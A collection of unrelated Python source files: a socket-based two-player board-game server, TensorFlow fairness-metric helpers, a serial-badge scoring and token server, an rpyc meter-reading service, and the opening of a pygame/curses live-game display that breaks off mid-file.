global winners
global el
turn = 0
timeout=120.0
trackTime1=120.0
trackTime2=120.0
global message
global message2
for player in socket_list:
player.settimeout(timeout)
while True:
if turn==0:
try:
start=time.time()
message = socket_list[0].recv(1024)
end=time.time()
trackTime1=trackTime1-(end-start)
print trackTime1
msg=map(int,message.split(' '))
if WON1==1:
if msg[1]==0 or (msg[2]==0 and msg[0]==0):
socket_list[0].send(message2+" 31")
socket_list[1].send("0 0 0 31")
print "Player 1 passes. SUCCESS"
turn =1
success=self.handle_click(msg[0],msg[1],msg[2])
continue
message2=str(trackTime1)
if trackTime1<0:
raise socket.timeout
except socket.timeout:
if WON1==1:
print "Timed out"
socket_list[0].send(message2+" 1")
socket_list[1].send(message+" 2")
print "Player 1 timed out, But player 1 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
else:
print "Timed out"
socket_list[0].send(message2+" 2")
socket_list[1].send(message+" 1")
print "Player 1 timed out, Player 2 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
else:
try:
start=time.time()
message = socket_list[1].recv(1024)
end=time.time()
trackTime2=trackTime2-(end-start)
print trackTime2
msg=map(int,message.split(' '))
if WON2==1:
if msg[1]==0 or (msg[2]==0 and msg[0]==0):
socket_list[1].send(message2+" 32")
socket_list[0].send("0 0 0 32")
print "Player 2 passes. SUCCESS"
turn =0
success=self.handle_click(msg[0],msg[1],msg[2])
continue
message2=str(trackTime2)
if trackTime2<0:
raise socket.timeout
except socket.timeout:
if WON2:
print "Timed out"
socket_list[1].send(message2+" 1")
socket_list[0].send(message+" 2")
print "Player 2 timed out, but Player 2 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
else:
print "Timed out"
socket_list[1].send(message2+" 2")
socket_list[0].send(message+" 1")
print "Player 2 timed out, Player 1 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
success=self.handle_click(msg[0],msg[1],msg[2])
if success==0:
if turn==0 and WON1==1:
socket_list[0].send(message2+" 1")
socket_list[1].send(message+" 2")
print "Player 1 made invalid move, But, Player 1 wins"
elif turn==0 and WON1==0:
socket_list[0].send(message2+" 2")
socket_list[1].send(message+" 1")
print "Player 1 made invalid move, Player 2 wins"
elif turn==1 and WON2==1:
socket_list[1].send(message2+" 1")
socket_list[0].send(message+" 2")
print "Player 2 made invalid move, But, Player 2 wins"
elif turn==1 and WON2==0:
socket_list[1].send(message2+" 2")
socket_list[0].send(message+" 1")
print "Player 2 made invalid move, Player 1 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
if success==2:
if WON1==1:
if turn==0:
socket_list[0].send(message2+" 1")
socket_list[1].send(message+" 2")
print "Player 1 wins"
if turn==1:
socket_list[0].send(message+" 1")
socket_list[1].send(message2+" 2")
print "Player 1 wins"
if WON2==1:
if turn==1:
socket_list[1].send(message2+" 1")
socket_list[0].send(message+" 2")
print "Player 2 wins"
if turn==0:
socket_list[1].send(message+" 1")
socket_list[0].send(message2+" 2")
print "Player 2 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
if success==1:
if turn==0 :
socket_list[0].send(message2+" 3")
socket_list[1].send(message+" 3")
if turn == 1:
socket_list[1].send(message2+" 3")
socket_list[0].send(message+" 3")
if success==31:
if turn==0 :
socket_list[0].send(message2+" 31")
socket_list[1].send(message+" 31")
if turn == 1:
socket_list[1].send(message2+" 31")
socket_list[0].send(message+" 31")
if success==32:
if turn==0 :
socket_list[0].send(message2+" 32")
socket_list[1].send(message+" 32")
if turn == 1:
socket_list[1].send(message2+" 32")
socket_list[0].send(message+" 32")
print "here: ",success
if self.thread_kill:
break
turn = 1-turn
for player in socket_list:
player.close()
print "--- END BACKGROUND LOOP ---"
def handle_quit(self):
self.thread_kill = True
for p in self.gs.players:
if p.ai:
p.ai.kill_thread()
self.tk_root.destroy()
def refresh(self, check_ai=True):
self.update_gs()
self.clear_ghost()
self.handle_mouse_motion(self.recent_x, self.recent_y)
self.active_wall = ""
self.active_move = ""
self.draw_players()
self.redraw_walls(False)
self.draw_current_player_icon()
self.draw_wall_counts()
def draw_current_player_icon(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH/2
radius = self.PLAYER_SIZE/2
x0, x1 = midx - radius, midx + radius
y0, y1 = self.ICON_MARGIN - radius, self.ICON_MARGIN + radius
c = self.DEFAULT_COLORS['players'][self.gs.current_player_num -1]
oval = self.tk_canv.create_oval(x0, y0, x1, y1, fill=c, outline="")
if self.icon:
self.tk_canv.delete(self.icon)
self.icon = oval
text = None
if self.gs.current_player.ai:
text = self.tk_canv.create_text((midx, self.ICON_MARGIN), text="AI", font=("Arial", 10, "bold"))
if self.ai_label:
self.tk_canv.delete(self.ai_label)
self.ai_label = text
def new_rect_button(self, text, fill, x0, y0, x1, y1, callback):
hover_lighten = TkBoard.alpha_hax(fill, "#FFFFFF", 0.25)
self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=fill, activefill=hover_lighten, outline="")
midx = (x0 + x1) / 2
midy = (y0 + y1) / 2
self.tk_canv.create_text((midx, midy), text=text, font=("Arial", 10, "bold"))
self.buttons.append(((x0, y0, x1, y1), callback))
def set_movetype(self, type):
self.moveType = type
self.refresh()
def toggle_movetype(self):
if self.moveType == "wall":
self.set_movetype("move")
elif self.moveType == "move":
self.set_movetype("wall")
self.refresh()
def draw_panel(self):
# panel bg
width, height = self.canvas_dims
midx = width-self.PANEL_WIDTH/2
c = self.DEFAULT_COLORS['panel']
self.tk_canv.create_rectangle(width-self.PANEL_WIDTH, 0, width, height, fill=c)
# current-player icon @ top
self.draw_current_player_icon()
# buttons!
c = self.DEFAULT_COLORS['button']
x0, x1 = midx-self.BUTTON_WIDTH/2, midx+self.BUTTON_WIDTH/2
y0, y1 = self.BUTTON_Y_START, self.BUTTON_Y_START + self.BUTTON_HEIGHT
self.new_rect_button("Move", c, x0, y0, x1, y1, lambda: self.set_movetype("move"))
yshift = self.BUTTON_HEIGHT + self.BUTTON_MARGIN
y0 += yshift
y1 += yshift
self.new_rect_button("Wall", c, x0, y0, x1, y1, lambda: self.set_movetype("wall"))
y0 += yshift
y1 += yshift
self.new_rect_button("undo", c, x0, y0, x1, y1, lambda: self.undo())
y0 += yshift
y1 += yshift
self.new_rect_button("redo", c, x0, y0, x1, y1, lambda: self.redo())
# "walls: IIII" text
self.draw_wall_counts()
def undo(self):
self.game_stack.undo()
self.refresh(False)
self.game_over = False
def redo(self):
self.game_stack.redo()
self.refresh()
def draw_wall_counts(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH/2
y = self.LABEL_Y_START
for i in range(len(self.gs.players)):
p = self.gs.players[i]
text = self.LABEL_TEXT(self.max_walls, p.num_walls)
c = self.DEFAULT_COLORS['players'][i]
l = self.wall_labels[i]
if not l:
l = self.tk_canv.create_text((midx, y), text=text, font=("Arial", self.LABEL_FONT_SIZE, "bold"), fill=c)
self.wall_labels[i] = l
else:
self.tk_canv.itemconfigure(l, text=text)
y += self.LABEL_SPACING + self.LABEL_FONT_SIZE
def handle_mouse_motion(self, x, y):
if self.game_over or self.gs.current_player.ai:
return
self.recent_x = x
self.recent_y = y
grid = self.point_to_grid((x,y))
if grid and self.moveType == "move":
move_str = h.point_to_notation(grid)
if move_str != self.active_move:
self.active_move = move_str
if self.gs.turn_is_valid(move_str, "move"):
self.draw_player(grid, self.gs.current_player_num-1, True)
elif self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
pos = h.point_to_notation(topleft)
wall_str = orient+pos
if wall_str != self.active_wall:
self.active_wall = wall_str
active_error = not self.gs.turn_is_valid(wall_str, "wall")
self.redraw_walls(active_error)
def handle_click(self,m,xi,yi):
x=10
y=20
print self.gs.current_player.position[0]
for b in self.buttons:
(x0, y0, x1, y1), callback = b
if (x0 <= x <= x1) and (y0 <= y <= y1):
callback()
return
if self.game_over or self.gs.current_player.ai:
return
print self.moveType
# check for turn execution
global is_redo_m
is_redo_m=False
if WON1==1 and self.gs.current_player_num==1 and m==0:
grid=self.gs.current_player.position
is_redo_m=True
elif WON2==1 and self.gs.current_player_num==2 and m==0:
grid=self.gs.current_player.position
is_redo_m=True
else:
grid=(xi,yi)
if m == 1 :
self.moveType="wall"
elif m == 2 :
self.moveType="wall"
else :
self.moveType="move"
if grid and self.moveType == "move":
move_str = h.point_to_notation(grid)
success = self.exec_wrapper(move_str)
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
if m == 1:
orient='H'
if m == 2:
orient='V'
pos = h.point_to_notation(topleft)
wall_str = orient+pos
success = self.exec_wrapper(wall_str)
print success
if success:
self.refresh()
return success
def handle_keypress(self, key):
(cr, cc) = self.gs.current_player.position
if key == "L":
cc -= 1
elif key == "R":
cc += 1
elif key == "U":
cr -= 1
elif key == "D":
cr += 1
move_str = h.point_to_notation((cr, cc))
success = self.exec_wrapper(move_str)
if success:
self.refresh()
def wall_on(self, wall_str, error=False):
color = self.DEFAULT_COLORS['wall'] if not error else self.DEFAULT_COLORS['wall-error']
if wall_str in self.walls:
box_id = self.walls[wall_str]
if not error:
self.tk_canv.itemconfigure(box_id, fill=color)
else:
# instead of above: changing color, delete and redraw it
# so it's the topmost element
self.tk_canv.delete(box_id)
(x0, y0, x1, y1) = self.wall_str_to_coords(wall_str)
self.walls[wall_str] = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=color, outline="")
def wall_off(self, wall_str):
if wall_str in self.walls:
box_id = self.walls[wall_str]
self.tk_canv.itemconfigure(box_id, fill="")
def redraw_walls(self, active_error=True):
for w in self.walls.keys():
self.wall_off(w)
for w in self.gs.walls:
self.wall_on(w)
if self.active_wall:
self.wall_on(self.active_wall, active_error)
def exec_wrapper(self, turn_str, from_ai=False):
global WON1
global WON2
global winners
global el
global is_redo_m
is_ai = self.gs.current_player.ai is not None
if from_ai != is_ai:
return 0
print "EXECUTING %s TURN" % ("AI" if is_ai else "HUMAN")
success = self.game_stack.execute_turn(turn_str,is_redo_m)
print success
is_redo_m=False
self.update_gs()
if success == 1:
if WON1==1:
print "\tSUCCESS_1"
self.moveType = "move"
self.refresh(False)
return 31
if WON2==1:
print "\tSUCCESS_2"
self.moveType = "move"
self.refresh(False)
return 32
print "\tSUCCESS"
self.moveType = "move"
self.refresh(False)
if WON1==1:
return 31
if WON2==1:
return 32
return 1
elif success == 2:
# winner!
print "Winner!!"
winners=winners+1
print "Player", self.gs.current_player_num
if winners==1:
el=0
if self.gs.current_player_num==2:
WON1=1
return 31
else:
WON2=1
return 32
if winners==2:
self.game_over = True
return 2
print "\tFAILED"
return 0
def draw_squares(self):
import random
for r in range(13):
for c in range(13):
x = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*c
y = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*r
color = self.DEFAULT_COLORS['square']
sq = self.tk_canv.create_rectangle(x, y, x+self.SQUARE_SIZE, y+self.SQUARE_SIZE, fill=color, outline="")
self.squares[r][c] = sq
def generate_walls(self):
for w in h.all_walls():
(x0, y0, x1, y1) = self.wall_str_to_coords(w)
# regular wall
r = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill="", outline="")
self.walls[w] = r
def xy_to_wall_spec(self, grid, x, y):
cx, cy = self.grid_to_point(grid)
dx = x-cx
dy = y-cy
# wall orientation - I'll explain this when you're older
r2 = 2**0.5
rotx = r2*dx - r2*dy
roty = r2*dx + r2*dy
if rotx*roty >= 0:
orient = 'V'
else:
orient = 'H'
# wall position (top-left)
gr, gc = grid
if dx < 0:
gc -= 1
if dy < 0:
gr -= 1
return (orient, (gr, gc))
def wall_str_to_coords(self, wall_str):
grid_pos = h.notation_to_point(wall_str[1:])
orient = wall_str[0]
cx, cy = self.grid_to_point(grid_pos)
wall_len = 2*self.SQUARE_SIZE + self.SQUARE_SPACING
wall_wid = self.SQUARE_SPACING
halfwidth = self.SQUARE_SIZE/2
if orient == 'V':
x0 = cx + halfwidth
y0 = cy - halfwidth
x1 = x0 + wall_wid
y1 = y0 + wall_len
elif orient == 'H':
x0 = cx - halfwidth
y0 = cy + halfwidth
x1 = x0 + wall_len
y1 = y0 + wall_wid
return (x0, y0, x1, y1)
def draw_players(self):
game_state = self.gs
# draw new ones
for i in range(len(game_state.players)):
p = game_state.players[i]
self.draw_player(p.get_pos(), i)
def draw_player(self, center, num, ghost=False):
xy = self.grid_to_point(center)
if not xy:
return
x, y = xy
# remove old ovals from the board
oval, text = self.players[num]
if not ghost and oval:
self.tk_canv.delete(oval)
if text:
self.tk_canv.delete(text)
elif ghost and self.player_ghost:
self.tk_canv.delete(self.player_ghost)
# draw new
c = self.DEFAULT_COLORS['players'][num]
if ghost:
bg = self.DEFAULT_COLORS['square']
c = TkBoard.alpha_hax(bg, c, 0.4)
radius = self.PLAYER_SIZE/2
oval = self.tk_canv.create_oval(x-radius, y-radius, x+radius, y+radius, fill=c, outline="")
text = None
if self.gs.players[num].ai:
text = self.tk_canv.create_text((x, y), text="AI", font=("Arial", 11, "bold"))
if not ghost:
self.players[num] = (oval, text)
else:
self.player_ghost = oval
def clear_ghost(self):
if self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
def grid_to_point(self, grid_pt):
"""given (row, col), return centerpoint of that square on the canvas
If not a valid grid point, return None"""
r, c = grid_pt
if (1 <= r <= 13) and (1 <= c <= 13):
x = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*(c-1)
y = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*(r-1)
halfsquare = self.SQUARE_SIZE/2
return (x+halfsquare, y+halfsquare)
else:
return None
def point_to_grid(self, xy):
"""given (x, y), return (row, col) of corresponding grid space.
If off the grid or one row of spacing on outside, returns None"""
x, y = xy
x -= self.MARGIN
y -= self.MARGIN
full_space = self.SQUARE_SIZE + self.SQUARE_SPACING
r = int(floor(y / full_space) + 1)
c = int(floor(x / full_space) + 1)
if (1 <= r <= 13) and (1 <= c <= 13):
return (r, c)
else:
return None
@staticmethod
def alpha_hax(back, front, alpha):
"""since tkinter doesnt support alpha channels as far as I can tell,
this function does 2-color blending on hex strings, returning blended hex string"""
# get numeric values
b_r = int(back[1:3], 16)
b_g = int(back[3:5], 16)
b_b = int(back[5:7], 16)
f_r = int(front[1:3], 16)
f_g = int(front[3:5], 16)
f_b = int(front[5:7], 16)
# combine 'em
new_r = int(b_r * (1-alpha) + f_r * alpha)
new_g = int(b_g * (1-alpha) + f_g * alpha)
new_b = int(b_b * (1-alpha) + f_b * alpha)
# get hex versions, take off leading '0x' and pad with "0" when len() < 2
hex_r = hex(new_r)[2:].rjust(2,"0")
hex_g = hex(new_g)[2:].rjust(2,"0")
hex_b = hex(new_b)[2:].rjust(2,"0")
return "#"+hex_r+hex_g+hex_b
def disp_time_stats(self):
print self.time_stats
def __init__(self, n, ai):
self.new_game(n, ai)
if __name__ == "__main__":
n = 2
if len(argv) > 1:
try:
n = int(argv[1])
except:
pass
ai = 0
if len(argv) > 2:
try:
ai = int(argv[2])
except:
pass
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.settimeout(30)
serversocket.bind(('127.0.0.1', 12345))
serversocket.listen(2)
print ("Server running and waiting for clients to connect")
while True:
clientsocket, addr = serversocket.accept()
print ("Client Connected from %s" % str(addr))
socket_list.append(clientsocket)
if len(socket_list)==2:
print "Both clients connected"
break
# 1st client will be in socket_list[0] and 2nd will be socket_list[1]
socket_list[0].send('1 13 13 14 120')
socket_list[1].send('2 13 13 14 120')
tkb = TkBoard(n, ai)
|
tf_utils.py
|
import tensorflow as tf
def _weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.get_variable("W", initializer=initial)
def _bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.get_variable("b", initializer=initial)
def _linear(x, output_size, name):
"""Construct a fully-connected linear layer.
"""
with tf.variable_scope(name):
W = _weight_variable([x.get_shape().as_list()[1], output_size])
b = _bias_variable([output_size])
output = tf.matmul(x, W) + b
return output
def lrelu(x, leak=0.2, name="lrelu"):
return tf.maximum(x, leak*x, name=name)
def zero_nans(*tensors):
return [tf.where(tf.is_nan(t), 0.0, t) for t in tensors]
def ema_apply_wo_nans(ema, tensors):
"""Updates ExponentialMovingAverage (ema) with current values of tensors
(similar to ema.apply(tensors) ), while ignoring tensors with NaN values.
"""
return [tf.cond(tf.is_nan(t),
true_fn = lambda: tf.no_op(),
false_fn = lambda: ema.apply([t]))
for t in tensors]
# ====== Tensorboard Ops ====================
from multiprocessing import Process
import subprocess
def launch_tensorboard(logdir, tensorboard_path=None):
if tensorboard_path is None:
import platform
assert platform.node != 'Yonadavs-MacBook-Air.local', "New users must specify path to tensorboard"
tensorboard_path = '/Users/yonadav/anaconda/envs/tensorflow3.5/bin/tensorboard'
def _call_tensorboard():
subprocess.call("{} --logdir={}".format(tensorboard_path, logdir),
shell=True)
tensorboard_process = Process(target=_call_tensorboard)
tensorboard_process.start()
return tensorboard_process
# ======= Bias-specific Ops =========================
def demographic_parity_discrimination(yhat, a):
"""Computes the difference in the mean prediction between protected
classes. (https://www.cs.toronto.edu/~toni/Papers/icml-final.pdf Eq. 14)
Args:
yhat - n x 1 tensor of predictions
a - n x 1 tf.bool tensor marking whether the individual is from the
protected class
Returns:
A scalar tensor of the difference in mean prediction between classes.
"""
yhat_a0, yhat_a1 = tf.dynamic_partition(yhat, tf.cast(a, tf.int32), 2)
disc = tf.abs(tf.reduce_mean(yhat_a0) - tf.reduce_mean(yhat_a1))
return disc
def equalized_odds_discrimination(yhat, a, y):
"""Computes the difference in the mean prediction between protected classes,
conditioned on the true outcome. Equivalent to the deviation from
'Equalized Odds' defined in https://arxiv.org/pdf/1610.02413.pdf
Args:
yhat - n x 1 tensor of predictions
a - n x 1 tf.bool tensor marking whether the individual is from the
protected class
y - n x 1 tf.bool tensor marking the individual's true outcome
Returns:
false_negative_parity_error - a scalar tensor of the mean deviation for
negative outcomes
false_positive_parity_error - a scalar tensor of the mean deviation for
negative outcomes
"""
partitions = tf.cast(y, tf.int32)*2 + tf.cast(a, tf.int32)
yhat_y0_a0, yhat_y0_a1, yhat_y1_a0, yhat_y1_a1 = tf.dynamic_partition(
yhat, partitions, 4)
false_negative_parity_error = tf.abs(tf.reduce_mean(yhat_y0_a0) -
tf.reduce_mean(yhat_y0_a1))
false_positive_parity_error = tf.abs(tf.reduce_mean(yhat_y1_a0) -
tf.reduce_mean(yhat_y1_a1))
return false_negative_parity_error, false_positive_parity_error
def crossentropy(yhat, y):
return -(tf.log(yhat)*y + tf.log(1-yhat)*(1-y))
def calibration_parity_loss(yhat, a, y, yhat_logits=None):
"""Computes the abs difference in the mean loss between protected
classes. (https://www.cs.toronto.edu/~toni/Papers/icml-final.pdf Eq. 14)
Args:
yhat - n x 1 tensor of predictions
a - n x 1 tf.bool tensor marking whether the individual is from the
protected class
yhat_logits - optional, n x 1 tensor of prediction logits used to
compute the crossentropy more efficiently if provided
Returns:
A scalar tensor of the difference in mean loss between classes.
"""
# TODO: implement check if there are no members of one of the classes
a = tf.cast(a, tf.int32)
y_a0, y_a1 = tf.dynamic_partition(tf.cast(y, tf.float32),
a, 2)
if yhat_logits is not None:
yhat_logits_a0, yhat_logits_a1 = tf.dynamic_partition(yhat_logits, a, 2)
disc = tf.abs(
tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(labels=y_a0,
logits=yhat_logits_a0))
- tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(labels=y_a1,
logits=yhat_logits_a1)))
else:
yhat_a0, yhat_a1 = tf.dynamic_partition(yhat, a, 2)
disc = tf.abs(
tf.reduce_mean(crossentropy(yhat_a0, y_a0))
- tf.reduce_mean(crossentropy(yhat_a1, y_a1))
)
return disc
|
server_client.py
|
#!/usr/bin/env python
import socket # Import socket module
import serial, time
import binascii
import struct
import SocketServer
import threading
import logging
import Queue
import argparse
from select import select
import sys
import parse
# Time to allow a connection to stay open (in seconds)
TIMEOUT = 20
# SLA team list
sla_team_list = list()
token_team_list = list()
# Setup the vip message queue (allow only 1 message maximum in the queue)
vip_message_queue = Queue.Queue(1)
def init_sla_list():
# Default to SLA pass~
for i in range(0, 20):
sla_team_list.append(True)
def init_token_list():
# Default to empty strings
for i in range(0, 20):
token_team_list.append("")
class SLAHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(TIMEOUT)
self.data = self.request.recv(1024).strip()
print "SLA {} wrote:".format(self.client_address[0])
print self.data
if ( self.data.find("TEAM") == 0 ):
team_num = int(self.data[4:])
if ( team_num < 20 ):
sla_for_team = sla_team_list[team_num]
if ( sla_for_team == True ):
self.request.sendall('PASS')
else:
self.request.sendall('FAIL')
else:
self.request.sendall('ERROR')
self.request.sendall('\n')
self.request.close()
except socket.timeout:
self.request.close()
return
class SLAServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
pass
class TokenHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(TIMEOUT)
self.data = self.request.recv(1024).strip()
print "SLA {} wrote:".format(self.client_address[0])
print self.data
if ( self.data.find("DEPOSIT") == 0 ):
team_num = int(self.data[7:])
if ( team_num < 20 ):
token_for_team = token_team_list[team_num]
self.request.sendall(token_for_team)
else:
self.request.sendall('ERROR')
self.request.sendall('\n')
self.request.close()
except socket.timeout:
self.request.close()
return
class TokenServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
pass
class VIPHandler(SocketServer.StreamRequestHandler):
def handle(self):
try:
self.request.settimeout(TIMEOUT)
self.data = self.rfile.readline().strip()
if ( self.data.find("vip") == 0 ):
# Send VIP message to badge
vip_message_queue.put( self.data )
except socket.timeout:
self.request.close()
return
class VIPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
pass
def process_serial_line( line_buf ):
if ( line_buf.find('SLR:') != -1 ):
results = parse.parse('SLR: {:d}:{:d}:{}', line_buf)
if ( results is not None ):
round_num = results[0]
team_num = results[1]
pass_result = results[2]
if ( pass_result == 'PASS' ):
sla_team_list[team_num] = True
else:
sla_team_list[team_num] = False
elif ( line_buf.find('TOK:') != -1 ):
results = parse.parse('TOK: Token:{:d}:{}', line_buf )
if ( results is not None ):
team_num = results[0]
token_string = results[1]
token_team_list[team_num] = token_string
class SerialBadgeConnection:
def Run( self, serial_port ):
ser = serial.Serial( )
ser.port = serial_port
ser.baudrate = 115200
ser.bytesize = serial.EIGHTBITS
ser.parity = serial.PARITY_NONE
ser.stopbits = serial.STOPBITS_ONE
ser.timeout = 0
ser.xonxoff = False
ser.rtscts = False
ser.dsrdtr = False
select_timeout = 0.01
sys.stdout.write('Server> ')
sys.stdout.flush()
line_buf = ""
try:
ser.open()
ser.flushInput()
ser.flushOutput()
if ( ser.isOpen == False ):
print "Failed to open serial console"
return
while ( True ):
rlist, _, _ = select([sys.stdin], [], [], 0.1 )
if sys.stdin in rlist:
in_line = sys.stdin.readline()
new_line = in_line.rstrip().encode()
print "Sent: %s" % new_line
ser.flush()
ser.write( new_line + '\n' )
#time.sleep(0.01)
#ser.write('\n')
ser.flush()
sys.stdout.write('Server> ')
sys.stdout.flush()
# Serial port stuffz
while ( ser.inWaiting() > 0 ):
char = ser.read(size=1)
if ( char == '\n' ):
# Process the serial line
process_serial_line( line_buf )
print "Line: %s\n" % line_buf
line_buf = ""
sys.stdout.write('Server> ')
sys.stdout.flush()
else:
line_buf += char
ser.write('\n')
ser.flush()
# SEND VIP messages to the badge if they are available
try:
vip_message = vip_message_queue.get_nowait()
except Queue.Empty:
# Ignore
pass
else:
# Process VIP message -- send to badge
sys.stdout.write('[VIP] ' + vip_message.encode() + '\n')
sys.stdout.flush()
ser.write( vip_message.encode() + '\n' )
ser.flush()
# Run serial connection to server badge
#if ( token_deposit_queue.get_nowait() is not None ):
# print 'TODO: Send deposit to server'
# Check for input
except Exception, e:
ser.close()
print "Serial Error : " + str(e)
raise e
return
ser.close()
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Badge SLA laptop client')
parser.add_argument('-p', '--port', default='/dev/ttyUSB0', help='Sets the serial port')
program_args = vars(parser.parse_args())
# Initialize the SLA poll results
init_sla_list()
init_token_list()
# Run SLA poll server
sla_address = ( '0.0.0.0', 8000 )
sla_server = SLAServer( sla_address, SLAHandler )
sla_ip, sla_port = sla_server.server_address
t = threading.Thread(target=sla_server.serve_forever)
t.setDaemon( True ) # don't hang on exit
t.start()
logger = logging.getLogger('client')
logger.info( 'SLA server on %s:%s', sla_ip, sla_port )
# Run Token Server
token_address = ( '0.0.0.0', 8001 )
token_server = TokenServer( token_address, TokenHandler )
token_ip, token_port = token_server.server_address
t2 = threading.Thread(target=token_server.serve_forever)
t2.setDaemon(True)
t2.start()
logger.info( 'Token server on %s:%s', token_ip, token_port )
# Run VIP Server
vip_address = ( '0.0.0.0', 8002 )
vip_server = VIPServer( vip_address, VIPHandler )
vip_ip, vip_port = vip_server.server_address
t3 = threading.Thread(target=vip_server.serve_forever)
t3.setDaemon(True)
t3.start()
logger.info( 'VIP server on %s:%s', token_ip, token_port )
# Run serial connection
ser_connection = SerialBadgeConnection()
ser_connection.Run( program_args['port'] )
sla_server.socket.close()
token_server.socket.close()
|
meterserver-rpyc.py
|
#!/usr/bin/env python3
# Copyright © 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import datetime
import threading
import rpyc
import sys
import MeterMT
PORT = 11003
Manager = MeterMT.Manager()
class MeterService(rpyc.Service):
def on_connect(self):
pass
def on_disconnect(self):
pass
exposed_login = Manager.login
exposed_get_status = Manager.get_status
exposed_get_job = Manager.get_job
def exposed_submit_reading(self, sessionId, meter, when, reading,
reason=""):
when = datetime.datetime.strptime(str(when)[:19],
"%Y-%m-%d %H:%M:%S")
Manager.submit_reading(sessionId, meter, when, reading, reason)
if __name__ == "__main__":
import rpyc.utils.server
print("Meter server startup at {}".format(
datetime.datetime.now().isoformat()[:19]))
server = rpyc.utils.server.ThreadedServer(MeterService, port=PORT)
thread = threading.Thread(target=server.start)
thread.start()
try:
if len(sys.argv) > 1: # Notify if called by a GUI client
with open(sys.argv[1], "wb") as file:
file.write(b"\n")
thread.join()
except KeyboardInterrupt:
pass
server.close()
print("\rMeter server shutdown at {}".format(
datetime.datetime.now().isoformat()[:19]))
MeterMT.Manager._dump()
|
livegame.py
|
#!/usr/bin/env python
import time;
import curses;
import sys;
import argparse;
import pickle;
import socket;
import threading;
import re;
import string;
import pygame;
import errno;
import os;
# For the server, the list of client sockets connected to us
connected_sockets = [];
connected_sockets_lock = threading.Lock();
ALIGN_LEFT = 0
ALIGN_CENTRE = 1
ALIGN_RIGHT = 2
default_font_name = "sans-serif";
# Functions to get the colour pair number given bg and fg colours
def colour2(fg, bg):
return curses.color_pair(bg * 8 + fg);
def colour(fg):
return curses.color_pair(fg);
def recvall(sock, length):
message = "";
while length > 0:
to_recv = min(4096, length);
chunk = sock.recv(to_recv);
length -= len(chunk);
message = message + chunk;
return message;
class PercentageWidth(object):
def __init__(self, pc):
self.pc = pc;
def get_px(self, surface):
return int(surface.get_width() * self.pc / 100);
class PercentageHeight(object):
def __init__(self, pc):
self.pc = pc;
def get_px(self, surface):
return int(surface.get_height() * self.pc / 100);
def limit_label_width(label, max_width):
if label.get_width() <= max_width:
return label;
try:
return pygame.transform.smoothscale(label, (max_width, label.get_height()));
except:
return pygame.transform.scale(label, (max_width, label.get_height()));
def get_sensible_font(font_name, desired_line_size, sysfont=True):
low = 10;
high = 200;
while True:
size = (low + high) / 2;
if sysfont:
font = pygame.font.SysFont(font_name, size);
else:
font = pygame.font.Font(font_name, size);
if font.get_linesize() == desired_line_size:
break;
elif font.get_linesize() < desired_line_size:
low = size + 1;
else:
high = size - 1;
if low > high:
size = high;
break;
if sysfont:
font = pygame.font.SysFont(font_name, size);
else:
font = pygame.font.Font(font_name, size);
return font;
def draw_label(surface, rect, text, fgcolour=(255,255,255), bgcolour=None, align=ALIGN_LEFT, border_colour=None, border_size=None):
(left, top, width, height) = rect;
if width <= 0 or height <= 0:
return;
if font_file:
font = get_sensible_font(font_file, height, sysfont=False);
else:
font = get_sensible_font(default_font_name, height, sysfont=True);
xspacing = int(font.get_linesize() * 0.1);
caption = font.render(text, 1, fgcolour);
if width is None:
width = caption.get_width();
label = pygame.Surface((width, height), pygame.SRCALPHA);
if bgcolour:
label.fill(bgcolour);
else:
label.blit(surface, (0,0), area=(left, top, width, height));
caption = limit_label_width(caption, width - 2 * xspacing);
if align == ALIGN_LEFT:
label.blit(caption, (xspacing, 0));
elif align == ALIGN_RIGHT:
x = width - (caption.get_width() + xspacing);
label.blit(caption, (x, 0));
else:
x = (width - caption.get_width()) / 2;
label.blit(caption, (x, 0));
if border_size:
surface.fill(border_colour,
(left - border_size, top - border_size,
width + 2 * border_size, height + 2 * border_size));
surface.blit(label, (left, top));
def shade_area(surface, rect, colour):
